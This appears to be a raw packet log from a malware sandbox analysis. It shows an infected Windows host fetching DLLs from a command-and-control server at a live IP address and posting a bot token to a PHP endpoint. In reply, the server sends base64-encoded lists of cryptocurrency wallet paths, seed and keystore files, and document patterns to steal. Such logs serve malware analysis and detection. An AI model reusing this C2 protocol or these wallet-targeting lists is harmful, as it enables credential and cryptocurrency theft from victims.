00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Mar 28, 2024 09:15:38.803684950 CET	94	OUT	GET /8e6d9db21fb63946/softokn3.dll HTTP/1.1 Host: 185.172.128.26 Cache-Control: no-cache
Mar 28, 2024 09:15:39.091310978 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:38 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Mar 28, 2024 09:15:39.444433928 CET	98	OUT	GET /8e6d9db21fb63946/vcruntime140.dll HTTP/1.1 Host: 185.172.128.26 Cache-Control: no-cache
Mar 28, 2024 09:15:39.746429920 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:39 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Mar 28, 2024 09:15:40.913028955 CET	202	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKFHDAKECFHIDHJDAAA Host: 185.172.128.26 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Mar 28, 2024 09:15:42.148092031 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Mar 28, 2024 09:15:43.657305002 CET	468	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIECFBAAAFHIIDGCGCBF Host: 185.172.128.26 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 46 42 41 41 41 46 48 49 49 44 47 43 47 43 42 46 2d 2d 0d 0a Data Ascii: ------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------FIECFBAAAFHIIDGCGCBFContent-Disposition: form-data; name="message"wallets------FIECFBAAAFHIIDGCGCBF--
Mar 28, 2024 09:15:43.959779024 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 4d 58 78 63 56 32 46 73 62 47 56 30 56 32 46 7a 59 57 4a 70 58 45 4e 73 61 57 56 75 64 46 78 58 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 6d 70 7a 62 32 35 38 4d 48 78 46 64 47 68 6c 63 6d 56 31 62 58 77 78 66 46 78 46 64 47 68 6c 63 6d 56 31 62 56 78 38 61 32 56 35 63 33 52 76 63 6d 56 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 58 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 53 31 4d 56 45 4e 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 52 58 68 76 5a 48 56 7a 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 38 5a 58 68 76 5a 48 56 7a 4c 6d 4e 76 62 6d 59 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 33 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 38 4d 58 78 63 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 63 66 48 42 68 63 33 4e 77 61 48 4a 68 63 32 55 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 58 48 78 7a 5a 57 56 6b 4c 6e 4e 6c 59 32 39 38 4d 48 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 48 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 77 78 66 46 78 46 62 47 56 6a 64 48 4a 76 62 6b 4e 68 63 32 68 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 54 58 56 73 64 47 6c 45 62 32 64 6c 66 44 46 38 58 45 31 31 62 48 52 70 52 47 39 6e 5a 56 78 38 62 58 56 73 64 47 6c 6b 62 32 64 6c 4c 6e 64 68 62 47 78 6c 64 48 77 77 66 45 70 68 65 48 67 67 52 47 56 7a 61 33 52 76 63 43 41 6f 62 32 78 6b 4b 58 77 78 66 46 78 71 59 58 68 34 58 45 78 76 59 32 Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2
Mar 28, 2024 09:15:43.975064993 CET	466	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIEHDAFHDHCBFIDGCFID Host: 185.172.128.26 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 32 64 35 64 30 35 38 63 36 39 39 66 65 65 61 66 32 61 31 30 61 34 34 64 30 33 37 37 34 61 36 33 38 65 66 32 62 31 66 37 33 33 61 36 37 65 66 33 63 37 61 37 63 63 31 30 35 36 37 31 34 38 30 66 38 62 33 64 33 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 2d 2d 0d 0a Data Ascii: ------HIEHDAFHDHCBFIDGCFIDContent-Disposition: form-data; name="token"882d5d058c699feeaf2a10a44d03774a638ef2b1f733a67ef3c7a7cc105671480f8b3d34------HIEHDAFHDHCBFIDGCFIDContent-Disposition: form-data; name="message"files------HIEHDAFHDHCBFIDGCFID--
Mar 28, 2024 09:15:44.277971983 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 28 Mar 2024 08:15:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2052 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 53 52 55 4e 38 4a 56 4a 46 51 30 56 4f 56 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 55 6b 56 44 66 43 56 53 52 55 4e 46 54 6c 51 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 48 77 71 4c 6e 68 74 62 48 77 78 4e 58 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 47 4a 68 59 32 74 31 63 46 78 38 4b 69 34 71 66 44 45 31 66 44 46 38 4d 58 78 54 56 55 4a 4d 53 55 31 46 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 54 64 57 4a 73 61 57 31 6c 49 46 52 6c 65 48 51 67 4d 31 78 4d 62 32 4e 68 62 46 78 54 5a 58 4e 7a 61 57 39 75 4c 6e 4e 31 59 6d 78 70 62 57 56 66 63 32 56 7a 63 32 6c 76 62 6c 78 38 4b 69 35 7a 64 57 4a 73 61 57 31 6c 58 79 70 38 4d 54 56 38 4d 58 77 78 66 46 5a 51 54 6c 39 44 61 58 4e 6a 62 31 5a 51 54 6e 77 6c 55 46 4a 50 52 31 4a 42 54 55 5a 4a 54 45 56 54 4a 56 78 63 4c 69 35 63 58 46 42 79 62 32 64 79 59 57 31 45 59 58 52 68 58 46 78 44 61 58 4e 6a 62 31 78 44 61 58 4e 6a 62 79 42 42 62 6e 6c 44 62 32 35 75 5a 57 4e 30 49 46 4e 6c 59 33 56 79 5a 53 42 4e 62 32 4a 70 62 47 6c 30 65 53 42 44 62 47 6c 6c 62 6e 52 63 55 48 4a 76 5a 6d 6c 73 5a 56 78 38 4b 69 35 34 62 57 78 38 4d 54 41 77 66 44 46 38 4d 48 78 57 55 45 35 66 52 6d 39 79 64 47 6c 75 5a 58 52 38 4a 56 42 53 54 30 64 53 51 55 Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVB